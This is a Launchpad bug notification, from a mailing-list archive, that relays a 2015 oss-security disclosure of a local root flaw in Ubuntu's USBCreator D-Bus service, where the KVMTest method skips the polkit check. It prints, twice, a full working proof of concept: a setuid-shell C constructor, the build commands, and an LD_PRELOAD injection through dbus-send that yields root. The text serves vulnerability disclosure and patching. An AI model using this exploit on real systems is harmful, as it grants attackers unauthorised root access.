[Bug 1447396] [NEW] Tavis Ormandy discovered a local root vulnerability with the com.ubuntu.USBCreator dbus service
Seth Arnold
1447396 at bugs.launchpad.net
Thu Apr 23 00:14:30 UTC 2015
*** This bug is a security vulnerability ***
Public security bug reported:
Reported on oss-security: http://www.openwall.com/lists/oss-
security/2015/04/22/12
Text from Tavis follows:
Hello,
[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]
On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.USBCreator. As far as I can tell, this is installed by
default.
It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.
This seems like an obvious mistake, and the following appears to work
on my machine:
$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
Thanks, Tavis.
** Affects: usb-creator (Ubuntu)
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to usb-creator in Ubuntu.
https://bugs.launchpad.net/bugs/1447396
Title:
Tavis Ormandy discovered a local root vulnerability with the
com.ubuntu.USBCreator dbus service
Status in usb-creator package in Ubuntu:
New
Bug description:
Reported on oss-security: http://www.openwall.com/lists/oss-
security/2015/04/22/12
Text from Tavis follows:
Hello,
[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]
On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.USBCreator. As far as I can tell, this is installed by
default.
It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.
This seems like an obvious mistake, and the following appears to work
on my machine:
$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
Thanks, Tavis.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/usb-creator/+bug/1447396/+subscriptions
More information about the foundations-bugs
mailing list